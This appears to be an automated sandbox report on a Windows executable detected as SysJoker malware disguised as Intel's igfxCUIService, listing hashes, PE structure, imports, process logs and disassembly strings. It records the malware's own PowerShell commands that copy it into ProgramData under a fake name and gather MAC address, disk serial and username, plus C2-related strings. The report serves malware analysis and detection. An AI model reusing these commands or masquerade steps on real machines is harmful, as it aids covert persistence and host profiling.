                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxtcgyim.deb.psm1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):80
                                Entropy (8bit):4.522338709846795
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFKOMHRTFi:SnqbKAKWGKMxTFi
                                MD5:C5634FF893F8A8DED82722075C1C3C2C
                                SHA1:3DF424425568D6CC0F3A88BBAB90CA721FC20C44
                                SHA-256:3D94B8F90F9750B62BB00F6648B1AD327C8CA96101C270EAE53AFB10EF4F14E5
                                SHA-512:980A3C99D53268A247A7E2D42B7BCDE8D83AA03253696E10BCCB21AB7BEA2E28184744A3174893B35BDFB6274BF5D96A973D5FBB6E8C9BB5B96F551B3B02B6C4
                                Malicious:false
                                Preview: # PowerShell test file to determine AppLocker lockdown mode 1/12/2022 2:13:46 PM
                                C:\Users\user\Documents\20220112\PowerShell_transcript.305090.U78yw9TH.20220112141320.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1097
                                Entropy (8bit):5.231490561673135
                                Encrypted:false
                                SSDEEP:24:BxSAq3Tvi3x/nx2DOXUW8UEaW70jeuKK6X4CIym1ZJXzEKFnxSAZixC:BZiTvqxfoOnEd7CKYB1ZlEKZZZixC
                                MD5:8365D33CCC4CEA6DC81FBEF8074AB171
                                SHA1:C496EBFC5BE5A922E538C1C207DE9537FC81EDFE
                                SHA-256:8E8C6AF2C3F6FAE12DC730B90E24EB44DA5AD7A6C1A18C1BC3D5D207049A5FC5
                                SHA-512:31ED3800A7991A213F31B09A51DDF72CC8FA5E2B22572CF2E7125F817DA5416C172BC73C08BEFDE2E19A65E4D8DB8A3E36AE0A3437CA2FD2BF6E616CB2F8F6DA
                                Malicious:false
                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20220112141348..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'..Process ID: 5848..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220112141348..**********************..PS>copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'..**********************..Command start time: 20220112141450..**********************..PS>$global:?..True..************
                                C:\Users\user\Documents\20220112\PowerShell_transcript.305090.zOvb_cEe.20220112141411.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1303
                                Entropy (8bit):5.259294238407679
                                Encrypted:false
                                SSDEEP:24:BxSA2G3Tvi3x/nx2DOXUWKYcdVWF0jeuKK6X4CIym1ZJXuyYcAmnxSAZNC:BZ2uTvqxfoOqYceFCKYB1ZsyYcAoZZNC
                                MD5:2BFD640543E531BDDD9BA1D7E839BE11
                                SHA1:00E520EC469EB47BAFD0F44CD2E73BEE529F2B79
                                SHA-256:F564AEE3F53BFCBE099DF22A14C20001FE353D0C73FE1E5B2916D2EDDE4454B7
                                SHA-512:1F92D6FDB177003A430D190232474458B932A24F890246604E7996B5982DBFBD4A7FF2DE0CBF420770F1FAB2F57938BDA6F48A34B14128F9486135CDF0B9D049
                                Malicious:false
                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20220112141453..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'..Process ID: 5312..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220112141453..**********************..PS>getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedi

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.560987668019584
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:qtjRj8L3Rw.exe
                                File size:401920
                                MD5:d90d0f4d6dad402b5d025987030cc87c
                                SHA1:fad66bdf5c5dc2c050cbc574832c6995dba086a0
                                SHA256:1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c
                                SHA512:c2faeacfd588585633630ad710f443a72c7617c2d5e37dbfe43570e6ac5904e4b81eb682356a48a93bb794ef5e9d8ad0d673966d57798079b4de62ea61241024
                                SSDEEP:12288:m00VdXicNHeft0d/BiqpD9JD9lusIhAzhM2RdM:mrzXiu+FZqp72iDc
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@........................@...N.......N.......N...............................g.......g.R.....g.......Rich...................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x424dcb
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x61312A62 [Thu Sep 2 19:47:46 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:86f89939b4b0c19157649ce986ae170e

                                Entrypoint Preview

                                Instruction
                                call 00007FF3F0B3277Fh
                                jmp 00007FF3F0B320DFh
                                push ebp
                                mov ebp, esp
                                sub esp, 00000324h
                                push ebx
                                push 00000017h
                                call 00007FF3F0B53284h
                                test eax, eax
                                je 00007FF3F0B32267h
                                mov ecx, dword ptr [ebp+08h]
                                int 29h
                                push 00000003h
                                call 00007FF3F0B32439h
                                mov dword ptr [esp], 000002CCh
                                lea eax, dword ptr [ebp-00000324h]
                                push 00000000h
                                push eax
                                call 00007FF3F0B3461Ah
                                add esp, 0Ch
                                mov dword ptr [ebp-00000274h], eax
                                mov dword ptr [ebp-00000278h], ecx
                                mov dword ptr [ebp-0000027Ch], edx
                                mov dword ptr [ebp-00000280h], ebx
                                mov dword ptr [ebp-00000284h], esi
                                mov dword ptr [ebp-00000288h], edi
                                mov word ptr [ebp-0000025Ch], ss
                                mov word ptr [ebp-00000268h], cs
                                mov word ptr [ebp-0000028Ch], ds
                                mov word ptr [ebp-00000290h], es
                                mov word ptr [ebp-00000294h], fs
                                mov word ptr [ebp-00000298h], gs
                                pushfd
                                pop dword ptr [ebp-00000264h]
                                mov eax, dword ptr [ebp+04h]
                                mov dword ptr [ebp-0000026Ch], eax
                                lea eax, dword ptr [ebp+04h]
                                mov dword ptr [ebp-00000260h], eax
                                mov dword ptr [ebp-00000324h], 00010001h
                                mov eax, dword ptr [eax-04h]
                                push 00000050h
                                mov dword ptr [ebp-00000270h], eax
                                lea eax, dword ptr [ebp-58h]
                                push 00000000h
                                push eax
                                call 00007FF3F0B34590h

                                Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5d4bc | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x3b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x62000 | 0x38d4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x585d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x586c0 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x585f0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4a000 | 0x1dc | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x48ddb | 0x48e00 | False | 0.509323408019 | data | 6.57262184076 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x4a000 | 0x13f90 | 0x14000 | False | 0.460668945313 | data | 5.42470846624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x5e000 | 0x21d0 | 0x1200 | False | 0.26953125 | data | 3.95317799649 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x61000 | 0x3b8 | 0x400 | False | 0.4111328125 | data | 3.18893503216 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x62000 | 0x38d4 | 0x3a00 | False | 0.670999461207 | data | 6.52552513001 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x61060 | 0x354 | data | English | United States

                                Imports

DLL | Imports
KERNEL32.dll | CreateDirectoryW, SizeofResource, HeapFree, GetModuleFileNameW, InitializeCriticalSectionEx, WaitForSingleObject, HeapSize, MultiByteToWideChar, Sleep, GetLastError, LockResource, DeleteFileW, GlobalFree, HeapReAlloc, RaiseException, FindResourceExW, LoadResource, FindResourceW, HeapAlloc, DecodePointer, HeapDestroy, DeleteCriticalSection, GetProcessHeap, WideCharToMultiByte, SleepEx, WriteConsoleW, CreateFileW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, ReadConsoleW, ReadFile, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, SetFilePointerEx, CloseHandle, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, EncodePointer, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, OutputDebugStringW, RtlUnwind, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetFileSizeEx, SetEndOfFile
SHELL32.dll | ShellExecuteW, ShellExecuteExW
ole32.dll | CoCreateInstance, CoUninitialize, CoInitialize
OLEAUT32.dll | SysAllocStringLen
WINHTTP.dll | WinHttpGetIEProxyConfigForCurrentUser, WinHttpGetProxyForUrl, WinHttpWriteData, WinHttpReadData, WinHttpSetTimeouts, WinHttpCloseHandle, WinHttpCrackUrl, WinHttpQueryDataAvailable, WinHttpQueryHeaders, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpSetOption, WinHttpConnect, WinHttpReceiveResponse, WinHttpOpenRequest, WinHttpSendRequest

                                Version Infos

                                Description:Data
                                LegalCopyright:Copyright 2012-2015, Intel Corporation
                                InternalName:IGFXCUISERVICE
                                FileVersion:6.15.10.5063
                                CompanyName:Intel Corporation
                                ProductName:Intel(R) Common User Interface
                                ProductVersion:6.15.10.5063
                                FileDescription:igfxCUIService Module
                                OriginalFilename:IGFXCUISERVICE.EXE
                                Translation:0x0409 0x04b0

                                Possible Origin

                                Language of compilation system:English
                                Country where language is spoken:United States

                                Network Behavior

                                No network behavior found

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Memory Usage

                                High Level Behavior Distribution

                                Behavior

                                System Behavior

                                General

                                Start time:14:13:06
                                Start date:12/01/2022
                                Path:C:\Users\user\Desktop\qtjRj8L3Rw.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\qtjRj8L3Rw.exe"
                                Imagebase:0xbd0000
                                File size:401920 bytes
                                MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: 00000000.00000000.532048911.0000000000C1A000.00000002.00020000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:14:13:09
                                Start date:12/01/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
                                Imagebase:0xb0000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:14:13:09
                                Start date:12/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff658540000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:14:13:54
                                Start date:12/01/2022
                                Path:C:\ProgramData\SystemData\igfxCUIService.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\ProgramData\SystemData\igfxCUIService.exe"
                                Imagebase:0xd10000
                                File size:401920 bytes
                                MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: 00000007.00000000.643724739.0000000000D5A000.00000002.00020000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: C:\ProgramData\SystemData\igfxCUIService.exe, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                Reputation:low

                                General

                                Start time:14:13:56
                                Start date:12/01/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
                                Imagebase:0xb0000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:14:13:56
                                Start date:12/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff658540000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:14:15:01
                                Start date:12/01/2022
                                Path:C:\Windows\SysWOW64\getmac.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\getmac.exe
                                Imagebase:0x50000
                                File size:65536 bytes
                                MD5 hash:6AB605BD2223BFB2E55A466BE9816914
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Start time:14:15:05
                                Start date:12/01/2022
                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
                                Imagebase:0xd60000
                                File size:391680 bytes
                                MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:14:15:09
                                Start date:12/01/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                                Imagebase:0xb0000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:14:15:09
                                Start date:12/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff658540000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Code Analysis

                                  Execution Graph

                                  Execution Coverage:2.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:11.1%
                                  Total number of Nodes:424
                                  Total number of Limit Nodes:17

                                  Graph


                                  Executed Functions

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$FindResource
                                  • String ID: ER4uCCkuRzRjHSU=$ERk1CSozUSoHMgUm$ERo+FTkkXQMiJxA=$ESQuBT8uQyglJy4QOicGXDMiayYtPQ==$JC4hHg4UeRQmIQcuMCxMVjw0$SystemDrive$`
                                  • API String ID: 3073988107-3092437485
                                  • Opcode ID: 1dc65200f98c395a9e37f2b8907bf4561ddc256f631bf711426f828138aa4896
                                  • Instruction ID: ab8801cd409ec03369ebc319dbcf3f5da797234246d8e736886faecd5aac626c
                                  • Opcode Fuzzy Hash: 1dc65200f98c395a9e37f2b8907bf4561ddc256f631bf711426f828138aa4896
                                  • Instruction Fuzzy Hash: 5B3247719002449BEB14EF78DC05BAEF7F4EF01310F1486ADE815AB792EB75A944CBA1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  Control-flow graph of the function at 00C02B5D (rendered graph not reproduced; internal call targets: 00C0AF0E, 00C02B9F; reads the PEB and calls GetCurrentProcess, TerminateProcess, ExitProcess)
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,?,00C02B5C,?,?,00000000,?,00000000,00000000), ref: 00C02B7F
                                  • TerminateProcess.KERNEL32(00000000,?,00C02B5C,?,?,00000000,?,00000000,00000000), ref: 00C02B86
                                  • ExitProcess.KERNEL32 ref: 00C02B98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 0404ee28ee20772327f5b603d54d95f48830eeb2d2d559ed537205aa7c6d5273
                                  • Instruction ID: bfe20f53f095591179c574d8e74aa3405f76692b8734226fcf353bde9da6fb01
                                  • Opcode Fuzzy Hash: 0404ee28ee20772327f5b603d54d95f48830eeb2d2d559ed537205aa7c6d5273
                                  • Instruction Fuzzy Hash: AAE04631001209ABCB162F64CD0CF8C3F28FB09351B004411F80A86172CB35DE81EA91
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Control-flow Graph

                                  Control-flow graph of the function at 00BDEEF0 (rendered graph not reproduced; internal call targets: 00BDA230, 00BD40F0, 00BD3EA0, 00BE7040, 00C01351, 00BE5750, 00BF4B47, 00BE72B0, 00BE4F70, 00BE5870, 00BE8500, 00BD76A0, 00BE5F90, 00BF44D0, 00BDEC90, 00BFC92F, 00BDEB40, 00BE4F30, 00BF7A10, 00BD73A0, 00BE5850, 00BD9CE0; Win32 calls: CreateDirectoryW, SysAllocStringLen, SleepEx, DeleteFileW)
                                  APIs
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,00C26C58,?,00C26C58), ref: 00BDF18D
                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 00BDF23F
                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 00BDF252
                                    • Part of subcall function 00BDEC90: CoInitialize.OLE32(00000000), ref: 00BDECE9
                                    • Part of subcall function 00BDEC90: CoCreateInstance.OLE32(00C1A2C0,00000000,00000001,00C1A2B0,?), ref: 00BDED08
                                  • SleepEx.KERNEL32(?,00000000,?,?,?,00C26C58,?,00C26C58), ref: 00BDF27F
                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,00C26C58,?,00C26C58), ref: 00BDF288
                                    • Part of subcall function 00BD9CE0: ShellExecuteExW.SHELL32(?), ref: 00BD9D3A
                                    • Part of subcall function 00BD9CE0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BD9D45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCreateString$DeleteDirectoryExecuteFileInitializeInstanceObjectShellSingleSleepWait
                                  • String ID: > "$" /F$' '$.zip$/api/attach$/api/req$/c $0/$4$IjkiCA==$Pj0mFDk=$Yyw/Aw==$\txc1.txt$\txc1.txt" && type "$\txc1.txt" > "$\txc2.txt$\txc2.txt"$`$cannot get value$cannot use operator[] with a numeric argument with $cannot use operator[] with a string argument with $data$dir$exe$exit$name$remove_reg$request$ss"}$tion"}$token=$type$url$y '${"status":"success","result":"
                                  • API String ID: 3126972231-2927576387
                                  • Opcode ID: 72fc88850650ca3da28da8fc76c6efd9ac9e690f75617ff637a5da2e34f012c4
                                  • Instruction ID: c9481fd3ed795d902bfd4e63e694e11989b82ae784743199857f54ae267cac0f
                                  • Opcode Fuzzy Hash: 72fc88850650ca3da28da8fc76c6efd9ac9e690f75617ff637a5da2e34f012c4
                                  • Instruction Fuzzy Hash: 0F42A030905649DBEB10DF68C849B9DFBF5EF55314F1882E9E419AB392EB309E04CB91
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,5CB9E59C), ref: 00BE00DA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileModuleName
                                  • String ID: type
                                  • API String ID: 514040917-2363381545
                                  • Opcode ID: 51a120f43e6620147e25fc700a08610f27fa27289b928771d209f8d72d7bb2e1
                                  • Instruction ID: 0700d9d71c111a1c40ad561004dd36035bfa7097a0e893f0c68b155f02eaf161
                                  • Opcode Fuzzy Hash: 51a120f43e6620147e25fc700a08610f27fa27289b928771d209f8d72d7bb2e1
                                  • Instruction Fuzzy Hash: 0071E671900248EBEB10EF69CC46BDEB7F9EB04700F5041D9F915A76C2DB746A44CBA6
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  Control-flow graph of the function at 00BD9CE0 (rendered graph not reproduced; Win32 calls: ShellExecuteExW, WaitForSingleObject)
                                  APIs
                                  • ShellExecuteExW.SHELL32(?), ref: 00BD9D3A
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BD9D45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteObjectShellSingleWait
                                  • String ID: <$@
                                  • API String ID: 1289292659-1426351568
                                  • Opcode ID: c0bbf89e5a8d38af17b04520724dc9eed95460104f59c44db683645bcffcae7b
                                  • Instruction ID: ba7a551204679e5ec35c615563d56b6fe48b56565afd965d4a0c16121a5c46d9
                                  • Opcode Fuzzy Hash: c0bbf89e5a8d38af17b04520724dc9eed95460104f59c44db683645bcffcae7b
                                  • Instruction Fuzzy Hash: 77113A71D016199BDB00CFA8C848B8EFBF5FF49324F248359E824AA2A4E7758944CFD0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  Control-flow graph of the function at 00BE5750 (rendered graph not reproduced; internal call targets: 00BE73E0, 00BE8590, 00BD3EA0; Win32 calls: MultiByteToWideChar, twice)
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,00BD9B59,?,?), ref: 00BE576A
